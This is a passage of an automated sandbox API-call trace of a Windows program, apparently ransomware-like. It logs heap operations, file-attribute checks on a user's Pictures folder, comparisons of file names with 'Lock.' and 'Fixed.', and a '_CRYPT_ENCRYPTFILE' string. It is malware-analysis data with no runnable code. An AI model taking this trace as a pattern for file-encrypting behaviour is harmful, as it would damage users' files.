lpBuffer="C:\\Users\\FD1HVy\\Pictures\\T9bmRc0wgjLMG_.jpg", lpFilePart=0x8cf650*="T9bmRc0wgjLMG_.jpg") returned 0x2b [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0253.821] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\T9bmRc0wgjLMG_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t9bmrc0wgjlmg_.jpg")) returned 0xffffffff [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.822] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0253.822] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.822] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0253.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0253.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TbPkae.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bPkae.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pkae.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kae.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ae.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0253.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0253.823] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0253.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0253.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0253.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0253.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e699a8 [0253.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0253.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TbPkae.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bPkae.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pkae.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kae.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ae.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0253.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0253.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0253.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0253.824] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0253.825] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.825] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.826] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0253.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0253.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0253.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0253.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0253.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0253.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0253.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0253.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0253.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0253.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0253.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0253.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0253.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0253.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0253.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0253.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 